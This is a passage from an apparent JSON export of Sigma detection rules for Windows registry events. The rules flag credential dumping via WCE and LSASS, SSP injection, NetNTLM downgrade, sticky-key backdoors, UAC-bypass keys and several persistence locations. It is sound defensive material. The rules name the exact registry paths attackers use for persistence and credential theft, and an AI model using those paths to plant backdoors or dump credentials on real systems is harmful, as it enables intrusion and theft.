    "content": "title: Windows Credential Editor Registry\nid: a6b33c02-8305-488f-8585-03cb2a7763f2\nstatus: test\ndescription: Detects the use of Windows Credential Editor (WCE)\nreferences:\n    - https://www.ampliasecurity.com/research/windows-credentials-editor/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-12-31\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0005\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: Services\\WCESERVICE\\Start\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml",
    "content": "title: HybridConnectionManager Service Installation - Registry\nid: ac8866c7-ce44-46fd-8c17-b24acff96ca8\nstatus: test\ndescription: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.\nreferences:\n    - https://twitter.com/Cyb3rWard0g/status/1381642789369286662\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2021-04-12\nmodified: 2022-11-27\ntags:\n    - attack.resource-development\n    - attack.t1608\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection1:\n        TargetObject|contains: '\\Services\\HybridConnectionManager'\n    selection2:\n        EventType: SetValue\n        Details|contains: 'Microsoft.HybridConnectionManager.Listener.exe'\n    condition: selection1 or selection2\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_mal_azorult.yml",
    "content": "title: Registry Entries For Azorult Malware\nid: f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7\nstatus: test\ndescription: Detects the presence of a registry key created during Azorult execution\nreferences:\n    - https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a\nauthor: Trent Liffick\ndate: 2020-05-08\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.execution\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        EventID:\n            - 12\n            - 13\n        TargetObject|contains: 'SYSTEM\\'\n        TargetObject|endswith: '\\services\\localNETService'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_malware_qakbot_registry.yml",
    "content": "title: Potential Qakbot Registry Activity\nid: 1c8e96cd-2bed-487d-9de0-b46c90cade56\nstatus: test\ndescription: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files\nreferences:\n    - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution\nauthor: Hieu Tran\ndate: 2023-03-13\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Software\\firm\\soft\\Name'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml",
    "content": "title: Path To Screensaver Binary Modified\nid: 67a6c006-3fbe-46a7-9074-2ba3b82c3000\nstatus: test\ndescription: Detects value modification of registry key containing path to binary used as screensaver.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md\n    - https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf\nauthor: Bartlomiej Czyz @bczyz1, oscd.community\ndate: 2020-10-11\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.002\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Control Panel\\Desktop\\SCRNSAVE.EXE' # HKEY_CURRENT_USER\\Control Panel\\Desktop\\SCRNSAVE.EXE\n    filter:\n        Image|endswith:\n            - '\\rundll32.exe'\n            - '\\explorer.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate modification of screensaver\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml",
    "content": "title: Narrator's Feedback-Hub Persistence\nid: f663a6d9-9d1b-49b8-b2b1-0637914d199a\nstatus: test\ndescription: Detects abusing Windows 10 Narrator's Feedback-Hub\nreferences:\n    - https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html\nauthor: Dmitriy Lifanov, oscd.community\ndate: 2019-10-25\nmodified: 2022-03-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection1:\n        EventType: DeleteValue\n        TargetObject|endswith: '\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\DelegateExecute'\n    selection2:\n        TargetObject|endswith: '\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\(Default)'\n    # Add the payload in the (Default)\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml",
    "content": "title: NetNTLM Downgrade Attack - Registry\nid: d67572a0-e2ec-45d6-b8db-c100d14b8ef2\nstatus: test\ndescription: Detects NetNTLM downgrade attack\nreferences:\n    - https://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks\n    - https://www.ultimatewindowssecurity.com/wiki/page.aspx?spid=NSrpcservers\nauthor: Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT)\ndate: 2018-03-20\nmodified: 2024-12-03\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection_regkey:\n        TargetObject|contains|all:\n            - 'SYSTEM\\'\n            - 'ControlSet'\n            - '\\Control\\Lsa'\n    selection_value_lmcompatibilitylevel:\n        TargetObject|endswith: '\\lmcompatibilitylevel'\n        Details:\n            - 'DWORD (0x00000000)'\n            - 'DWORD (0x00000001)'\n            - 'DWORD (0x00000002)'\n    selection_value_ntlmminclientsec:\n        TargetObject|endswith: '\\NtlmMinClientSec'\n        Details:\n            - 'DWORD (0x00000000)' # No Security\n            - 'DWORD (0x00000010)' # Only Integrity\n            - 'DWORD (0x00000020)' # Only confidentiality\n            - 'DWORD (0x00000030)' # Both Integrity and confidentiality\n    selection_value_restrictsendingntlmtraffic:\n        # Note: The obvious values with issues are 0x00000000 (allow all) and 0x00000001 (audit).\n        # 0x00000002 can be secure but only if \"ClientAllowedNTLMServers\" is properly configured\n        # Hence all values should be monitored and investigated\n        TargetObject|endswith: '\\RestrictSendingNTLMTraffic'\n    condition: selection_regkey and 1 of selection_value_*\nfalsepositives:\n    - Services or tools that set the values to more restrictive values\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml",
    "content": "title: New DLL Added to AppCertDlls Registry Key\nid: 6aa1d992-5925-4e9f-a49b-845e51d1de01\nstatus: test\ndescription: |\n  Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\n  by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\nreferences:\n    - http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/\n    - https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html\nauthor: Ilyas Ochkov, oscd.community\ndate: 2019-10-25\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.009\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        # Sysmon gives us HKLM\\SYSTEM\\CurrentControlSet\\.. if ControlSetXX is the selected one\n        - TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCertDlls'\n        # key rename\n        - NewName: 'HKLM\\SYSTEM\\CurentControlSet\\Control\\Session Manager\\AppCertDlls'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml",
    "content": "title: New DLL Added to AppInit_DLLs Registry Key\nid: 4f84b697-c9ed-4420-8ab5-e09af5b2345d\nstatus: test\ndescription: DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html\nauthor: Ilyas Ochkov, oscd.community, Tim Shelton\ndate: 2019-10-25\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.010\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        - TargetObject|endswith:\n              - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls'\n              - '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls'\n        # Key Rename\n        - NewName|endswith:\n              - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls'\n              - '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls'\n    filter:\n        Details: '(Empty)'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_office_test_regadd.yml",
    "content": "title: Office Application Startup - Office Test\nid: 3d27f6dd-1c74-4687-b4fa-ca849d128d1c\nstatus: test\ndescription: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started\nreferences:\n    - https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/\nauthor: omkar72\ndate: 2020-10-25\nmodified: 2023-11-08\ntags:\n    - attack.persistence\n    - attack.t1137.002\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Software\\Microsoft\\Office test\\Special\\Perf'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_office_trust_record_modification.yml",
    "content": "title: Windows Registry Trust Record Modification\nid: 295a59c1-7b79-4b47-a930-df12c15fc9c2\nrelated:\n    - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd\n      type: similar\nstatus: test\ndescription: Alerts on trust record modification within the registry, indicating usage of macros\nreferences:\n    - https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/\n    - http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html\n    - https://twitter.com/inversecos/status/1494174785621819397\nauthor: Antonlovesdnb, Trent Liffick (@tliffick)\ndate: 2020-02-19\nmodified: 2023-06-21\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Security\\Trusted Documents\\TrustRecords'\n    condition: selection\nfalsepositives:\n    - This will alert on legitimate macro usage as well, additional tuning is required\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml",
    "content": "title: Registry Persistence Mechanisms in Recycle Bin\nid: 277efb8f-60be-4f10-b4d3-037802f37167\nstatus: test\ndescription: Detects persistence registry keys for Recycle Bin\nreferences:\n    - https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf\n    - https://persistence-info.github.io/Data/recyclebin.html\n    - https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/\nauthor: frack113\ndate: 2021-11-18\nmodified: 2022-12-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection_create:\n        EventType: RenameKey\n        NewName|contains: '\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open'\n    selection_set:\n        EventType: SetValue\n        TargetObject|contains: '\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command\\(Default)'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml",
    "content": "title: New PortProxy Registry Entry Added\nid: a54f842a-3713-4b45-8c84-5f136fdebd3c\nstatus: test\ndescription: Detects the modification of the PortProxy registry key which is used for port forwarding.\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html\n    - https://adepts.of0x.cc/netsh-portproxy-code/\n    - https://www.dfirnotes.net/portproxy_detection/\nauthor: Andreas Hunkeler (@Karneades)\ndate: 2021-06-22\nmodified: 2024-03-25\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        # Example: HKLM\\System\\CurrentControlSet\\Services\\PortProxy\\v4tov4\\tcp\\0.0.0.0/1337\n        TargetObject|contains: '\\Services\\PortProxy\\v4tov4\\tcp\\'\n    condition: selection\nfalsepositives:\n    - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)\n    - Synergy Software KVM (https://symless.com/synergy)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml",
    "content": "title: RedMimicry Winnti Playbook Registry Manipulation\nid: 5b175490-b652-4b02-b1de-5b5b4083c5f8\nstatus: test\ndescription: Detects actions caused by the RedMimicry Winnti playbook\nreferences:\n    - https://redmimicry.com\nauthor: Alexander Rausch\ndate: 2020-06-24\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        TargetObject|contains: HKLM\\SOFTWARE\\Microsoft\\HTMLHelp\\data\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_runkey_winekey.yml",
    "content": "title: WINEKEY Registry Modification\nid: b98968aa-dbc0-4a9c-ac35-108363cbf8d5\nstatus: test\ndescription: Detects potential malicious modification of run keys by winekey or team9 backdoor\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html\nauthor: omkar72\ndate: 2020-10-30\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Backup Mgr'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_runonce_persistence.yml",
    "content": "title: Run Once Task Configuration in Registry\nid: c74d7efc-8826-45d9-b8bb-f04fac9e4eff\nstatus: test\ndescription: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup\nreferences:\n    - https://twitter.com/pabraeken/status/990717080805789697\n    - https://lolbas-project.github.io/lolbas/Binaries/Runonce/\nauthor: 'Avneet Singh @v3t0_, oscd.community'\ndate: 2020-11-15\nmodified: 2024-03-25\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Active Setup\\Installed Components'\n        TargetObject|endswith: '\\StubPath'\n    filter_optional_chrome:\n        Details|contains|all:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\'\n            - '\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level' # In some cases the Details will contain an additional flag called \"--channel=stable\" at the end\n    filter_optional_edge:\n        Details|contains:\n            - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n            - 'C:\\Program Files\\Microsoft\\Edge\\Application\\'\n        Details|endswith: '\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate modification of the registry key by legitimate program\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml",
    "content": "title: Shell Open Registry Keys Manipulation\nid: 152f3630-77c1-4284-bcc0-4cc68ab2f6e7\nrelated:\n    - id: dd3ee8cc-f751-41c9-ba53-5a32ed47e563\n      type: similar\nstatus: test\ndescription: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)\nreferences:\n    - https://github.com/hfiref0x/UACME\n    - https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/\n    - https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass\n    - https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2022-01-13\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\n    - attack.t1546.001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection1:\n        EventType: SetValue\n        TargetObject|endswith: 'Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue'\n        Details|contains: '\\Software\\Classes\\{'\n    selection2:\n        TargetObject|endswith: 'Classes\\ms-settings\\shell\\open\\command\\DelegateExecute'\n    selection3:\n        EventType: SetValue\n        TargetObject|endswith:\n            - 'Classes\\ms-settings\\shell\\open\\command\\(Default)'\n            - 'Classes\\exefile\\shell\\open\\command\\(Default)'\n    filter_sel3:\n        Details: '(Empty)'\n    condition: selection1 or selection2 or (selection3 and not filter_sel3)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml",
    "content": "title: Potential Credential Dumping Via LSASS SilentProcessExit Technique\nid: 55e29995-75e7-451a-bef0-6225e2f13597\nrelated:\n    - id: 36803969-5421-41ec-b92f-8500f79c23b0\n      type: similar\nstatus: test\ndescription: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process\nreferences:\n    - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/\n    - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-02-26\nmodified: 2022-12-19\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml",
    "content": "title: Security Support Provider (SSP) Added to LSA Configuration\nid: eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc\nstatus: test\ndescription: |\n    Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.\nreferences:\n    - https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/\n    - https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Install-SSP.ps1#L157\nauthor: iwillkeepwatch\ndate: 2019-01-18\nmodified: 2022-08-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.005\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\Control\\Lsa\\Security Packages'\n            - '\\Control\\Lsa\\OSConfig\\Security Packages'\n    filter_main_msiexec:\n        Image:\n            - 'C:\\Windows\\system32\\msiexec.exe'\n            - 'C:\\Windows\\syswow64\\MsiExec.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml",
    "content": "title: Sticky Key Like Backdoor Usage - Registry\nid: baca5663-583c-45f9-b5dc-ea96a22ce542\nstatus: test\ndescription: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen\nreferences:\n    - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/\n    - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/\nauthor: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community\ndate: 2018-03-15\nmodified: 2022-11-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.008\n    - car.2014-11-003\n    - car.2014-11-008\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection_registry:\n        TargetObject|endswith:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger'\n    condition: selection_registry\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml",
    "content": "title: Atbroker Registry Change\nid: 9577edbb-851f-4243-8c91-1d5b50c1a39b\nstatus: test\ndescription: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'\nreferences:\n    - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/\n    - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/\nauthor: Mateusz Wydra, oscd.community\ndate: 2020-10-13\nmodified: 2023-01-19\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.persistence\n    - attack.t1547\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs'\n            - 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration'\n    filter_atbroker:\n        Image: 'C:\\Windows\\system32\\atbroker.exe'\n        TargetObject|contains: '\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration'\n        Details: '(Empty)'\n    filter_uninstallers:\n        Image|startswith: 'C:\\Windows\\Installer\\MSI'\n        TargetObject|contains: 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Creation of non-default, legitimate at usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml",
    "content": "title: Suspicious Run Key from Download\nid: 9c5037d1-c568-49b3-88c7-9846a5bdc2be\nstatus: test\ndescription: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories\nreferences:\n    - https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poude (Nextron Systems)\ndate: 2019-10-01\nmodified: 2025-02-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - '\\AppData\\Local\\Packages\\Microsoft.Outlook_'\n            - '\\AppData\\Local\\Microsoft\\Olk\\Attachments\\'\n            - '\\Downloads\\'\n            - '\\Temporary Internet Files\\Content.Outlook\\'\n            - '\\Local Settings\\Temporary Internet Files\\'\n        TargetObject|contains:\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run'\n    condition: selection\nfalsepositives:\n    - Software installers downloaded and used by users\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml",
    "content": "title: DLL Load via LSASS\nid: b3503044-60ce-4bf4-bbcb-e3db98788823\nstatus: test\ndescription: Detects a method to load DLL via LSASS process using an undocumented Registry key\nreferences:\n    - https://blog.xpnsec.com/exploring-mimikatz-part-1/\n    - https://twitter.com/SBousseaden/status/1183745981189427200\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-16\nmodified: 2022-04-21\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1547.008\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt'\n            - '\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt'\n    filter_domain_controller:\n        Image: 'C:\\Windows\\system32\\lsass.exe'\n        Details:\n            - '%%systemroot%%\\system32\\ntdsa.dll'\n            - '%%systemroot%%\\system32\\lsadb.dll'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml",
    "content": "title: Suspicious Camera and Microphone Access\nid: 62120148-6b7a-42be-8b91-271c04e281a3\nstatus: test\ndescription: Detects Processes accessing the camera and microphone from suspicious folder\nreferences:\n    - https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072\nauthor: Den Iuzvyk\ndate: 2020-06-07\nmodified: 2022-10-09\ntags:\n    - attack.collection\n    - attack.t1125\n    - attack.t1123\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection_1:\n        TargetObject|contains|all:\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\'\n            - '\\NonPackaged'\n    selection_2:\n        TargetObject|contains:\n            - microphone\n            - webcam\n    selection_3:\n        TargetObject|contains:\n            - ':#Windows#Temp#'\n            - ':#$Recycle.bin#'\n            - ':#Temp#'\n            - ':#Users#Public#'\n            - ':#Users#Default#'\n            - ':#Users#Desktop#'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely, there could be conferencing software running from a Temp folder accessing the devices\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_susp_process_registry_modification.yml",
    "content": "title: Registry Tampering by Potentially Suspicious Processes\nid: 7f4c43f9-b1a5-4c7d-b24a-b41bf3a3ebf2\nrelated:\n    - id: 2a0a169d-cc66-43ce-9ae2-6e678e54e46a\n      type: similar\n    - id: 921aa10f-2e74-4cca-9498-98f9ca4d6fdf\n      type: similar\nstatus: experimental\ndescription: |\n    Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc.\n    These processes are rarely used for legitimate registry modifications, and their activity may indicate an attempt to modify the registry\n    without using standard tools like regedit.exe or reg.exe, potentially for evasion and persistence.\nreferences:\n    - https://www.nextron-systems.com/2025/07/29/detecting-the-most-popular-mitre-persistence-method-registry-run-keys-startup-folder/\n    - https://www.linkedin.com/posts/mauricefielenbach_livingofftheland-redteam-persistence-activity-7344801774182051843-TE00/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-08-13\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.execution\n    - attack.t1112\n    - attack.t1059.005\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            # Add more suspicious processes\n            - '\\mshta.exe'\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n    condition: selection\nfalsepositives:\n    - Some legitimate admin or install scripts may use these processes for registry modifications.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_set_enable_anonymous_connection.yml",
